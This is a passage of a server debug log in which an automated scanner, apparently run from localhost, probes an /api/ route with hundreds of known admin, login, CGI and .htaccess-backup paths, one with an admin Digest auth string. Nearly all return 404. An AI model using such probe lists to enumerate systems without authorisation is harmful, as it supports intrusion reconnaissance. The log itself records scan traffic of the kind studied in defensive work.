1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.171Z debug: [1667255986170, duration: 1] GET:/api/lang_pack/EN.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.203Z debug: [1667255986201, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.209Z debug: [1667255986209, duration: 0] GET:/api/authentication/login/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.238Z debug: [1667255986237, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.245Z debug: [1667255986245, duration: 0] GET:/api/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.278Z debug: [1667255986275, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.286Z debug: [1667255986285, duration: 0] GET:/api/CSCOnm/servlet/login/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.321Z debug: [1667255986320, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.329Z debug: [1667255986328, duration: 0] GET:/api/about.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.362Z debug: [1667255986360, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.369Z debug: [1667255986368, duration: 1] GET:/api/admin/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.404Z debug: [1667255986402, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.414Z debug: [1667255986413, duration: 1] GET:/api/restconf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.455Z debug: [1667255986453, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.462Z debug: [1667255986461, duration: 1] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.498Z debug: [1667255986497, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.506Z debug: [1667255986505, duration: 0] GET:/api/login?redirects=10, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.544Z debug: [1667255986542, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.552Z debug: [1667255986551, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.584Z debug: [1667255986582, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.591Z debug: [1667255986590, duration: 0] GET:/api/csamc52/webadmin?page=invalid&type=browser, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.620Z debug: [1667255986619, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.627Z debug: [1667255986626, duration: 0] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.661Z debug: [1667255986659, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.668Z debug: [1667255986667, duration: 1] GET:/api/admin/public/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.697Z debug: [1667255986695, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.738Z debug: [1667255986737, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.746Z debug: [1667255986744, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.788Z debug: [1667255986786, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.795Z debug: [1667255986794, duration: 1] GET:/api/nls/ApplicationProperties-en.json, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.824Z debug: [1667255986822, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:46.830Z debug: [1667255986830, duration: 0] GET:/api/securecgi-bin/CSUserCGI.exe?ver, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.839Z debug: [1667255986838, duration: 1] GET:/api/securecgi-bin/CSUserCGI.exe?Init+0, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:46.868Z debug: [1667255986867, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:48.811Z debug: [1667255988810, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:48.818Z debug: [1667255988818, duration: 0] GET:/api/Login.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:48.827Z debug: [1667255988827, duration: 0] GET:/api/admin/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:48.831Z debug: [1667255988830, duration: 1] GET:/api/buglist.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:48.868Z debug: [1667255988866, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:48.877Z debug: [1667255988875, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:48.925Z debug: [1667255988923, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:48.932Z debug: [1667255988931, duration: 1] GET:/api/MM/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:48.986Z debug: [1667255988984, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:48.994Z debug: [1667255988993, duration: 0] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.030Z debug: [1667255989028, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.037Z debug: [1667255989036, duration: 1] GET:/api/nosuchfile-660393169-2090859540.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.068Z debug: [1667255989066, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.075Z debug: [1667255989075, duration: 0] GET:/api/self_upgrade.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.095Z debug: [1667255989094, duration: 0] GET:/api/forum.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.115Z debug: [1667255989114, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.121Z debug: [1667255989120, duration: 1] GET:/api/webapps/login/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.128Z debug: [1667255989127, duration: 0] GET:/api/webct/about.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.166Z debug: [1667255989161, duration: 5] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.173Z debug: [1667255989172, duration: 1] GET:/api/bitrix/admin/index.php?lang=en, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.207Z debug: [1667255989205, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.232Z debug: [1667255989231, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.240Z debug: [1667255989239, duration: 1] GET:/api/cgi-mod/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.269Z debug: [1667255989268, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.277Z debug: [1667255989277, duration: 0] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.309Z debug: [1667255989307, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.315Z debug: [1667255989314, duration: 1] GET:/api/header.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.346Z debug: [1667255989344, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.352Z debug: [1667255989351, duration: 1] GET:/api/.htaccess.old, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.359Z debug: [1667255989358, duration: 1] GET:/api/.htaccess.bak, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.367Z debug: [1667255989366, duration: 1] GET:/api/.htaccess~, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.374Z debug: [1667255989373, duration: 0] GET:/api/.htaccess.copy, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.382Z debug: [1667255989381, duration: 1] GET:/api/.htaccess.tmp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.391Z debug: [1667255989390, duration: 0] GET:/api/..htaccess.swp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.400Z debug: [1667255989399, duration: 0] GET:/api/.htaccess.1, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.407Z debug: [1667255989406, duration: 1] GET:/api/.htaccess.~1~, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.431Z debug: [1667255989430, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.437Z debug: [1667255989436, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.481Z debug: [1667255989480, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.488Z debug: [1667255989487, duration: 1] GET:/api/cgi-bin/kvm.cgi?&file=login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.509Z debug: [1667255989508, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.515Z debug: [1667255989514, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.546Z debug: [1667255989545, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.553Z debug: [1667255989552, duration: 1] GET:/api/snmx-cgi/fxm.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.574Z debug: [1667255989573, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.580Z debug: [1667255989580, duration: 0] GET:/api/sdn/ui/app/index, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.607Z debug: [1667255989606, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.649Z debug: [1667255989647, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.655Z debug: [1667255989654, duration: 0] GET:/api/platform-ui/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.684Z debug: [1667255989683, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.690Z debug: [1667255989689, duration: 1] GET:/api/server-info, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.724Z debug: [1667255989722, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.729Z debug: [1667255989729, duration: 0] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.757Z debug: [1667255989755, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.763Z debug: [1667255989762, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.797Z debug: [1667255989796, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.808Z debug: [1667255989806, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.845Z debug: [1667255989844, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.852Z debug: [1667255989852, duration: 0] GET:/api/pluto/portal/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.882Z debug: [1667255989880, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.889Z debug: [1667255989888, duration: 1] GET:/api/nifi/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:49.925Z debug: [1667255989923, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:49.932Z debug: [1667255989931, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:53.851Z debug: [1667255993850, duration: 1] GET:/api/cgi/mid.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:58.874Z debug: [1667255998873, duration: 0] GET:/api/cgi-bin/admin, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:59.950Z debug: [1667255999948, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:03.896Z debug: [1667256003895, duration: 0] GET:/api/cgi-bin/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:08.921Z debug: [1667256008920, duration: 0] GET:/api/cgi-bin/admin.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:13.945Z debug: [1667256013944, duration: 0] GET:/api/cgi-bin/administrator, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:16.987Z debug: [1667256016984, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:16.997Z debug: [1667256016995, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:18.967Z debug: [1667256018966, duration: 1] GET:/api/cgi-bin/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:22.017Z debug: [1667256022015, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:23.987Z debug: [1667256023986, duration: 1] GET:/api/cgi-bin/agorn.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:29.010Z debug: [1667256029009, duration: 0] GET:/api/cgi-bin/bugreport.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:34.032Z debug: [1667256034031, duration: 1] GET:/api/cgi-bin/cart.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:39.057Z debug: [1667256039055, duration: 1] GET:/api/cgi-bin/clwarn.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:44.074Z debug: [1667256044073, duration: 1] GET:/api/cgi-bin/count.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:47.113Z debug: [1667256047112, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:47.128Z debug: [1667256047126, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:49.095Z debug: [1667256049094, duration: 1] GET:/api/cgi-bin/Count.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.052Z debug: [1667256050050, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.060Z debug: [1667256050058, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.091Z debug: [1667256050089, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.098Z debug: [1667256050097, duration: 0] GET:/api/unified-console.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.134Z debug: [1667256050132, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.140Z debug: [1667256050140, duration: 0] GET:/api/login/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.148Z debug: [1667256050147, duration: 1] GET:/api/admin/airflow/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.188Z debug: [1667256050186, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.196Z debug: [1667256050195, duration: 0] GET:/api/api/v1/?format=api, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.234Z debug: [1667256050225, duration: 9] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.242Z debug: [1667256050241, duration: 0] GET:/api/api/v1/?format=api, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.280Z debug: [1667256050278, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.287Z debug: [1667256050286, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.321Z debug: [1667256050319, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.329Z debug: [1667256050328, duration: 1] GET:/api/libs/granite/core/content/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.365Z debug: [1667256050363, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.374Z debug: [1667256050373, duration: 1] GET:/api/system/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.407Z debug: [1667256050406, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.415Z debug: [1667256050414, duration: 1] GET:/api/system/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.447Z debug: [1667256050445, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.454Z debug: [1667256050454, duration: 0] GET:/api/courier/web/1000@/wmLogin.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.490Z debug: [1667256050489, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.512Z debug: [1667256050511, duration: 1] GET:/api/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.528Z debug: [1667256050528, duration: 0] GET:/api/chassis/config/GeneralChassisConfig.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.546Z debug: [1667256050546, duration: 0] GET:/api/this_page_should_not_exist.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:50.578Z debug: [1667256050577, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:50.588Z debug: [1667256050587, duration: 1] GET:/api/qwe/qwe/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:54.188Z debug: [1667256054187, duration: 0] GET:/api/cgi-bin/faqmanager.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:57.067Z debug: [1667256057065, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:57.075Z debug: [1667256057074, duration: 1] GET:/api/axis2/services/CUPMService/ping, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:57.083Z debug: [1667256057082, duration: 1] GET:/api/dfcweb/lib/cupm/nls/applicationproperties.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:57.133Z debug: [1667256057132, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:40:57.143Z debug: [1667256057141, duration: 1] GET:/api/emsam/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:40:59.209Z debug: [1667256059208, duration: 1] GET:/api/cgi-bin/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:04.230Z debug: [1667256064229, duration: 0] GET:/api/cgi-bin/FormMail.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:09.251Z debug: [1667256069250, duration: 1] GET:/api/cgi-bin/guestbook.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:14.274Z debug: [1667256074273, duration: 0] GET:/api/cgi-bin/help.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:19.295Z debug: [1667256079294, duration: 1] GET:/api/cgi-bin/hi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:24.315Z debug: [1667256084314, duration: 1] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:29.425Z debug: [1667256089424, duration: 0] GET:/api/cgi-bin/index.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:34.447Z debug: [1667256094446, duration: 1] GET:/api/cgi-bin/index.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:39.470Z debug: [1667256099469, duration: 1] GET:/api/cgi-bin/login.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:44.490Z debug: [1667256104489, duration: 1] GET:/api/cgi-bin/mailit.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:49.521Z debug: [1667256109520, duration: 0] GET:/api/cgi-bin/mt/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:54.542Z debug: [1667256114541, duration: 0] GET:/api/cgi-bin/mt/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:41:59.562Z debug: [1667256119561, duration: 1] GET:/api/cgi-bin/mt-static/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:04.714Z debug: [1667256124713, duration: 1] GET:/api/cgi-bin/mt-static/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:09.736Z debug: [1667256129735, duration: 1] GET:/api/cgi-bin/ncbook/book.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:14.767Z debug: [1667256134766, duration: 1] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:19.854Z debug: [1667256139853, duration: 1] GET:/api/cgi-bin/printenv.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:24.875Z debug: [1667256144874, duration: 1] GET:/api/cgi-bin/quickstore.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:29.896Z debug: [1667256149895, duration: 0] GET:/api/cgi-bin/search, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:34.917Z debug: [1667256154916, duration: 0] GET:/api/cgi-bin/search.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:39.938Z debug: [1667256159937, duration: 1] GET:/api/cgi-bin/search/search.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:44.959Z debug: [1667256164957, duration: 1] GET:/api/cgi-bin/status, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:49.978Z debug: [1667256169977, duration: 1] GET:/api/cgi-bin/status.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:42:55.001Z debug: [1667256174998, duration: 3] GET:/api/cgi-bin/test.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:00.024Z debug: [1667256180023, duration: 0] GET:/api/cgi-bin/test.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:05.043Z debug: [1667256185042, duration: 1] GET:/api/cgi-bin/test-cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:10.066Z debug: [1667256190064, duration: 1] GET:/api/cgi-bin/upload.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:15.088Z debug: [1667256195087, duration: 1] GET:/api/cgi-bin/urlcount.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:20.110Z debug: [1667256200109, duration: 1] GET:/api/cgi-bin/viewcvs.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:25.132Z debug: [1667256205130, duration: 1] GET:/api/cgi-bin/wa, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:30.156Z debug: [1667256210155, duration: 1] GET:/api/cgi-bin/wa.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:35.179Z debug: [1667256215176, duration: 3] GET:/api/cgi-bin/wa.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:40.203Z debug: [1667256220202, duration: 0] GET:/api/cgi-bin/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:45.222Z debug: [1667256225221, duration: 0] GET:/api/cgi-bin-sdb/printenv, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:50.242Z debug: [1667256230241, duration: 1] GET:/api/cgi-mod/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:43:55.264Z debug: [1667256235263, duration: 0] GET:/api/cgi-sys/defaultwebpage.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:00.284Z debug: [1667256240283, duration: 1] GET:/api/cgi-sys/entropysearch.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:05.307Z debug: [1667256245306, duration: 0] GET:/api/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:10.331Z debug: [1667256250330, duration: 1] GET:/api/index.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:15.352Z debug: [1667256255351, duration: 0] GET:/api/index.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:20.378Z debug: [1667256260377, duration: 0] GET:/api/nph-mr.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:25.399Z debug: [1667256265398, duration: 1] GET:/api/query.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:30.420Z debug: [1667256270419, duration: 0] GET:/api/session_login.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:35.543Z debug: [1667256275542, duration: 1] GET:/api/show_bug.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:40.564Z debug: [1667256280563, duration: 1] GET:/api/test, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:45.585Z debug: [1667256285584, duration: 1] GET:/api/test.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:50.614Z debug: [1667256290613, duration: 1] GET:/api/ucsm/isSamInstalled.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:44:55.636Z debug: [1667256295635, duration: 0] GET:/api/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:00.661Z debug: [1667256300660, duration: 1] GET:/api/wp-login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:05.690Z debug: [1667256305688, duration: 1] GET:/api/wwwadmin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:10.713Z debug: [1667256310711, duration: 1] GET:/api/wwwboard.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:15.735Z debug: [1667256315734, duration: 0] GET:/api/xampp/cgi.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:20.760Z debug: [1667256320757, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:45:20.771Z debug: [1667256320769, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:45:25.787Z debug: [1667256325785, duration: 1] GET:/api/_mt/mt.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:30.809Z debug: [1667256330808, duration: 0] GET:/api/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:35.832Z debug: [1667256335831, duration: 1] GET:/api/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:40.854Z debug: [1667256340853, duration: 1] GET:/api/buglist.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:45.874Z debug: [1667256345873, duration: 1] GET:/api/cgi/mid.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:50.896Z debug: [1667256350895, duration: 0] GET:/api/cgi-bin/admin, reqOrigin: ::1, resCode: 404 +2022-10-31T22:45:55.947Z debug: [1667256355946, duration: 0] GET:/api/cgi-bin/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:00.970Z debug: [1667256360968, duration: 1] GET:/api/cgi-bin/admin.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:05.989Z debug: [1667256365988, duration: 0] GET:/api/cgi-bin/administrator, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:11.012Z debug: [1667256371011, duration: 1] GET:/api/cgi-bin/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:16.036Z debug: [1667256376035, duration: 0] GET:/api/cgi-bin/agorn.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:21.057Z debug: [1667256381056, duration: 1] GET:/api/cgi-bin/bugreport.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:26.078Z debug: [1667256386077, duration: 0] GET:/api/cgi-bin/cart.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:31.100Z debug: [1667256391098, duration: 1] GET:/api/cgi-bin/clwarn.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:36.133Z debug: [1667256396132, duration: 0] GET:/api/cgi-bin/count.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:41.155Z debug: [1667256401154, duration: 0] GET:/api/cgi-bin/Count.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:46.174Z debug: [1667256406173, duration: 0] GET:/api/cgi-bin/faqmanager.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:51.204Z debug: [1667256411202, duration: 2] GET:/api/cgi-bin/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:46:56.224Z debug: [1667256416223, duration: 1] GET:/api/cgi-bin/FormMail.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:01.246Z debug: [1667256421245, duration: 1] GET:/api/cgi-bin/guestbook.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:06.267Z debug: [1667256426266, duration: 1] GET:/api/cgi-bin/help.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:11.290Z debug: [1667256431289, duration: 1] GET:/api/cgi-bin/hi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:16.313Z debug: [1667256436312, duration: 1] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:17.729Z debug: [1667256437728, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:47:17.736Z debug: [1667256437735, duration: 0] GET:/api/officescan/default.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:17.744Z debug: [1667256437743, duration: 1] 